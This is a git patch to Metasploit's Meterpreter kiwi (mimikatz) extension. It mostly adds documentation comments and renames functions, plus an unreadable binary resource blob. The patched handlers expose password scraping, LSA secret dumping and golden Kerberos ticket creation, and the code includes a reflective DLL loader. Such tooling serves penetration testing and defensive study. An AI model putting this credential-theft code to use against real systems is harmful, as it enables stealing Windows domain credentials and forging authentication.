From 32c71267937e274aa6e0b496b92efa00c6b6f9cb Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 19 Mar 2014 17:48:44 +1000
Subject: [PATCH] Fixes, documentation and tidying of kiwi code
---
c/meterpreter/source/common/core.c | 1 +
c/meterpreter/source/extensions/kiwi/debug.h | 2 +-
.../source/extensions/kiwi/mimikatz/main.c | 68 +++-
.../source/extensions/kiwi/mimikatz/main.h | 7 +-
.../extensions/kiwi/mimikatz/mimikatz.aps | Bin 0 -> 17160 bytes
.../extensions/kiwi/mimikatz/mimikatz.c | 176 ++---------
.../extensions/kiwi/mimikatz/mimikatz.h | 2 -
.../kiwi/mimikatz/mimikatz_interface.c | 298 +++++++++++++-----
.../kiwi/mimikatz/mimikatz_interface.h | 17 +-
.../kiwi/mimikatz/modules/kuhl_m_lsadump.c | 2 +-
.../mimikatz/modules/kuhl_m_lsadump_struct.h | 2 +-
.../sekurlsa/crypto/kuhl_m_sekurlsa_nt5.c | 2 +-
.../modules/sekurlsa/kuhl_m_sekurlsa.c | 60 ++--
.../ext_server_kiwi/ext_server_kiwi.vcxproj | 3 -
.../ext_server_kiwi.vcxproj.filters | 3 -
15 files changed, 353 insertions(+), 290 deletions(-)
create mode 100644 c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.aps
diff --git a/c/meterpreter/source/common/core.c b/c/meterpreter/source/common/core.c
index fa440d4c..668d2aca 100644
--- a/c/meterpreter/source/common/core.c
+++ b/c/meterpreter/source/common/core.c
@@ -324,6 +324,7 @@ DWORD packet_add_tlv_string( Packet *packet, TlvType type, LPCSTR str )
* @param targetTlv Pointer to the \c Tlv which will contain the wide string value
* @param type TLV type for the value.
* @param str Pointer to the wide-string value to add to the packet.
+ * @param strLength The length of the string, in characters, excluding the terminating NULL.
* @return Indication of success or failure.
* @retval ERROR_SUCCESS The operation completed successfully.
* @retval ERROR_NOT_ENOUGH_MEMORY Insufficient memory available.
diff --git a/c/meterpreter/source/extensions/kiwi/debug.h b/c/meterpreter/source/extensions/kiwi/debug.h
index 292110f9..2218d067 100644
--- a/c/meterpreter/source/extensions/kiwi/debug.h
+++ b/c/meterpreter/source/extensions/kiwi/debug.h
@@ -1,6 +1,6 @@
#pragma once
-#define DEBUGTRACE
+//#define DEBUGTRACE
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/main.c b/c/meterpreter/source/extensions/kiwi/mimikatz/main.c
index a05a27ba..2fb23ac5 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/main.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/main.c
@@ -1,13 +1,12 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
+/*!
+ * @file main.c
+ * @brief Entry point for the kiwi extension.
+ */
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
- // include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
- // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
- // second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
+// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
+// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
+// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// this sets the delay load hook function, see DelayLoadMetSrv.h
@@ -23,6 +22,7 @@ DWORD request_kerberos_ticket_purge(Remote *remote, Packet *packet);
DWORD request_kerberos_ticket_list(Remote *remote, Packet *packet);
DWORD request_lsa_dump_secrets(Remote *remote, Packet *packet);
+/*! @brief The enabled commands for this extension. */
Command customCommands[] =
{
COMMAND_REQ("kiwi_scrape_passwords", request_scrape_passwords),
@@ -34,6 +34,12 @@ Command customCommands[] =
COMMAND_TERMINATOR
};
+/*!
+ * @brief Handler for the lsa dump secrets message.
+ * @param remote Pointer to the \c Remote instance.
+ * @param packet Pointer to the incoming packet.
+ * @returns \c ERROR_SUCCESS
+ */
DWORD request_lsa_dump_secrets(Remote *remote, Packet *packet)
{
DWORD result;
@@ -47,6 +53,12 @@ DWORD request_lsa_dump_secrets(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
+/*!
+ * @brief Handler for the use kerberos ticket message.
+ * @param remote Pointer to the \c Remote instance.
+ * @param packet Pointer to the incoming packet.
+ * @returns \c ERROR_SUCCESS
+ */
DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet)
{
Packet * response = packet_create_response(packet);
@@ -70,6 +82,12 @@ DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet)
return result;
}
+/*!
+ * @brief Handler for the create golden kerberos ticket message.
+ * @param remote Pointer to the \c Remote instance.
+ * @param packet Pointer to the incoming packet.
+ * @returns \c ERROR_SUCCESS
+ */
DWORD request_kerberos_golden_ticket_create(Remote *remote, Packet *packet)
{
DWORD result;
@@ -94,6 +112,12 @@ DWORD request_kerberos_golden_ticket_create(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
+/*!
+ * @brief Handler for the list kerberos tickets message.
+ * @param remote Pointer to the \c Remote instance.
+ * @param packet Pointer to the incoming packet.
+ * @returns \c ERROR_SUCCESS
+ */
DWORD request_kerberos_ticket_list(Remote *remote, Packet *packet)
{
DWORD result;
@@ -107,6 +131,12 @@ DWORD request_kerberos_ticket_list(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
+/*!
+ * @brief Handler for the purge current kerberos tickets message.
+ * @param remote Pointer to the \c Remote instance.
+ * @param packet Pointer to the incoming packet.
+ * @returns \c ERROR_SUCCESS
+ */
DWORD request_kerberos_ticket_purge(Remote *remote, Packet *packet)
{
DWORD result = mimikatz_kerberos_ticket_purge();
@@ -118,6 +148,12 @@ DWORD request_kerberos_ticket_purge(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
+/*!
+ * @brief Handler for the password scraping message.
+ * @param remote Pointer to the \c Remote instance.
+ * @param packet Pointer to the incoming packet.
+ * @returns \c ERROR_SUCCESS
+ */
DWORD request_scrape_passwords(Remote *remote, Packet *packet)
{
DWORD result;
@@ -132,15 +168,17 @@ DWORD request_scrape_passwords(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
-/*
- * Initialize the server extension
+/*!
+ * @brief Initialises the server extension.
+ * @param remote Pointer to the \c Remote instance.
+ * @returns \c ERROR_SUCCESS
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
hMetSrv = remote->hMetSrv;
dprintf("[KIWI] Init server extension - initorclean");
- mimikatz_initOrClean(TRUE);
+ mimikatz_init_or_clean(TRUE);
dprintf("[KIWI] Init server extension - register");
command_register_all(customCommands);
@@ -150,12 +188,14 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
return ERROR_SUCCESS;
}
-/*
- * Deinitialize the server extension
+/*!
+ * @brief Deinitialises the server extension.
+ * @param remote Pointer to the \c Remote instance.
+ * @returns \c ERROR_SUCCESS
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
- mimikatz_initOrClean(FALSE);
+ mimikatz_init_or_clean(FALSE);
command_deregister_all(customCommands);
return ERROR_SUCCESS;
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/main.h b/c/meterpreter/source/extensions/kiwi/mimikatz/main.h
index d1e34831..23c8c174 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/main.h
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/main.h
@@ -1,3 +1,7 @@
+/*!
+ * @file main.h
+ * @brief TLV related bits for the KIWI extension.
+ */
#ifndef _METERPRETER_SOURCE_EXTENSION_KIWI_KIWI_H
#define _METERPRETER_SOURCE_EXTENSION_KIWI_KIWI_H
@@ -12,8 +16,7 @@
#define KIWI_PWD_ID_SEK_TSPKG ((UINT)4)
#define KIWI_PWD_ID_SEK_LIVESSP ((UINT)5)
#define KIWI_PWD_ID_SEK_SSP ((UINT)6)
-#define KIWI_PWD_ID_SEK_TICKETS ((UINT)7)
-#define KIWI_PWD_ID_SEK_DPAPI ((UINT)8)
+#define KIWI_PWD_ID_SEK_DPAPI ((UINT)7)
#define TLV_TYPE_KIWI_PWD_ID MAKE_CUSTOM_TLV(TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 1)
#define TLV_TYPE_KIWI_PWD_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 2)
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.aps b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.aps
new file mode 100644
index 0000000000000000000000000000000000000000..1c8555165cab146a44d287f62bda75cd15ee9cd8
GIT binary patch
literal 17160
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
